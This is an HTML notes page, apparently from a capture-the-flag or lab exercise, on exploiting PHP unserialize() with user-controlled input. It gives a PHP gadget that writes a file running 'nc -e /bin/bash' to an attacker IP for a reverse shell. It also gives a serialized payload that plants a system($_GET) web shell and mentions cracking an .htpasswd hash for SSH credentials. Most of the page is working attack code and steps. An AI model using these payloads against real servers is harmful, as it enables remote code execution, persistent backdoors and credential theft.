<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>De-serialization(php)</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>De-serialization(php)</h1>

      <div class="ck-content">
        <p>If there is a <code>unserialize</code> function being called with a user
          controlled parameter, then we can exploit php de-serialization. Since PHP
          allows object serialization, attackers could pass ad-hoc serialized strings
          to a vulnerable u<code>nserialize()</code> call, resulting in an arbitrary
          PHP object(s) injection into the application scope. In our code the application
          takes a file name, which gets read using PHP <code>file_get_contents</code> function.
          The output is then fed to php unserialize module.</p><pre><code class="language-text-plain">&lt;?php
class file
{
 public $file = 'n.php';
 public $data = '&lt;?php shell_exec("nc -e /bin/bash 10.17.17.11 1234"); ?&gt;';
}
echo (serialize(new file));
?&gt;</code></pre>

        <p>run the above payload and save the serialized output as <code>shell.txt</code> and
          upload with <a href="http://10.17.17.11/shell.txt"><code>http://10.17.17.11/shell.txt</code></a> argument
          to <code>file_get_contents</code>, then run the created file <code>n.php</code> to
          get a reverse shell.</p>
        <p>The payload is:</p><pre><code class="language-text-plain">O:10:"FormSubmit":2:{s:9:"form_file";s:8:"test.php";s:7:"message";s:26:"&lt;?php+system($_GET[1]);+?&gt;";}</code></pre>

        <p>rce on /test.php?1=ls </p>
        <p>there's a hash file(.htpasswd), cracking it gives ssh creds
          <br /> </p>
      </div>
    </div>
  </body>

</html>